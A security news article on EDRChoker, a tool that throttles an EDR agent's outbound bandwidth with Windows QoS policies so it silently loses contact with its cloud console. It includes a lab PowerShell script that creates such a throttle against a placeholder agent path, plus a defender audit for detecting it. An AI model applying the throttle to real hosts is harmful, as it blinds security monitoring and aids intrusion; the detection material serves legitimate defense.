EDRChoker Exploits Windows QoS to Quietly Disable EDR Agents

The open source tool uses Windows' Policy-based Quality of Service (QoS) to throttle the EDR agent's outbound bandwidth to 8 bits per second, sidestepping the detection logic written for traditional firewall-based blocking.

CSBadmin
2 Min Read

A red team tool named EDRChoker has been released that targets cloud-connected Endpoint Detection and Response (EDR) agents with a network-throttling technique rather than the usual process termination or code injection. It uses Windows' native Policy-based Quality of Service (QoS) engine to cap the bandwidth available to the EDR agent's processes at almost zero, which effectively severs the link between the endpoint agent and its cloud management server: the agent can no longer send telemetry, receive policy updates, or execute remote commands. The agent process itself keeps running throughout.

Technique and Bypass

EDRChoker uses the New-NetQosPolicy PowerShell cmdlet to create a QoS policy whose application-path match condition names the EDR's executables and whose throttle action is set as low as 8 bits per second. A policy-based QoS throttle shapes only the matched process's outbound traffic, but at one byte per second even a standard TLS handshake cannot complete: the ClientHello alone takes several minutes to leave the host, far longer than either side's timeout. The enforcement point is pacer.sys, the QoS Packet Scheduler, an NDIS Lightweight Filter driver that sits just above the network adapter's miniport driver and below the TCP/IP stack, and therefore below the layers at which the Windows Filtering Platform (WFP) inspects and blocks connections. Because the agent's packets are queued and paced there rather than rejected by a WFP filter, nothing generates the packet-block events that detection rules for higher-level filtering look for.

Impact and Scope

Traditional ways of cutting an EDR agent off, such as Windows Defender Firewall rules or direct Windows Filtering Platform API calls, produce packet-drop and connection-block events (for example Windows security event 5157 when WFP auditing is enabled) that platforms like Elastic Defend can alert on. EDRChoker produces none of these; the agent simply sees connection timeouts that closely resemble an ordinary unreliable network. By exploiting the architectural dependency of cloud-connected EDR on a persistent, low-latency channel to its backend, the tool gives red teams a stealthier defense-evasion option, and it highlights a blind spot in detection mechanisms that focus on process termination or firewall-rule modification. Two practical limits apply: creating a local QoS policy requires administrative rights on the host, and the policy itself is ordinary, enumerable configuration, so defenders can audit Get-NetQosPolicy output and QoS policy changes instead of waiting for a block event that will never come.
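The following PowerShell script is an added example, not EDRChoker's own code, written to show both halves of the technique described in the two sections above: building the QoS throttle policy that starves a matched executable of outbound bandwidth, and the defender-side audit that finds such a policy by enumerating QoS configuration rather than waiting for a firewall block event. The policy name, the agent path, and the 64 kbps audit threshold are placeholders chosen for this example; the name of the bits-per-second property on the Get-NetQosPolicy output object is also an assumption, so the script reads it defensively. It must run from an elevated session on a Windows host whose adapter has the QoS Packet Scheduler (ms_pacer) bound, and it should only ever be run in a lab.

```powershell
# Added example, not EDRChoker's code. Reproduces the QoS throttle against a
# placeholder executable and shows how a defender enumerates it afterwards.
# Assumptions (placeholders): $PolicyName, $AgentExe, and the 64000 bps threshold.
#Requires -RunAsAdministrator

$PolicyName = 'Lab-AgentThrottle'                          # assumed policy name
$AgentExe   = 'C:\Program Files\ExampleEDR\agent.exe'      # assumed placeholder path

function Test-PacerBound {
    # pacer.sys only paces traffic on adapters where the QoS Packet Scheduler
    # binding (component ID ms_pacer) is enabled; without it the policy is inert.
    $b = Get-NetAdapterBinding -ComponentID ms_pacer -ErrorAction SilentlyContinue
    return (@($b | Where-Object Enabled).Count -gt 0)
}

function New-AgentThrottlePolicy {
    param(
        [string]$Name = $PolicyName,
        [string]$AppPath = $AgentExe,
        [uint64]$BitsPerSecond = 8   # 8 bps is the smallest rate the cmdlet accepts: one byte per second
    )
    if (-not (Test-PacerBound)) { throw 'QoS Packet Scheduler is not bound to any adapter' }
    # Policy-based QoS throttles only the OUTBOUND packets of processes whose
    # image path matches; inbound traffic is untouched, which is still enough to
    # stall a TLS handshake because the ClientHello never gets out in time.
    New-NetQosPolicy -Name $Name `
                     -AppPathNameMatchCondition $AppPath `
                     -ThrottleRateActionBitsPerSecond $BitsPerSecond
}

function Get-ThrottleBps {
    param($Policy)
    # Assumption: the CIM object exposes the throttle in bits per second as
    # ThrottleRateAction; the second branch covers the parameter-style name.
    if ($null -ne $Policy.ThrottleRateAction) { return [uint64]$Policy.ThrottleRateAction }
    if ($null -ne $Policy.ThrottleRateActionBitsPerSecond) { return [uint64]$Policy.ThrottleRateActionBitsPerSecond }
    return [uint64]0
}

function Find-SuspiciousQosPolicy {
    # Defender-side audit: any per-process throttle below the threshold is worth a look.
    # 64 kbps is an assumed cut-off; legitimate shaping of a single executable is rarely that low.
    param([uint64]$MaxBitsPerSecond = 64000)
    Get-NetQosPolicy | ForEach-Object {
        $bps = Get-ThrottleBps $_
        if ($bps -gt 0 -and $bps -le $MaxBitsPerSecond -and $_.AppPathNameMatchCondition) {
            [pscustomobject]@{
                Name        = $_.Name
                Owner       = $_.Owner
                AppPath     = $_.AppPathNameMatchCondition
                ThrottleBps = $bps
            }
        }
    }
}

function Remove-AgentThrottlePolicy {
    param([string]$Name = $PolicyName)
    # Cleanup: removing the policy restores normal pacing immediately.
    Remove-NetQosPolicy -Name $Name -Confirm:$false
}

# Lab walkthrough: apply the throttle, audit for it, then remove it.
New-AgentThrottlePolicy | Out-Null
Find-SuspiciousQosPolicy | Format-Table -AutoSize
Remove-AgentThrottlePolicy
```

The audit function is the part worth keeping: because the throttle is plain QoS configuration rather than a filter that drops packets, the only host-side signal is the existence of the policy itself, so scheduling Find-SuspiciousQosPolicy (or alerting on New-NetQosPolicy invocations in PowerShell script-block logs) is how a defender covers the gap the article describes.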

Source: Cyber Security News
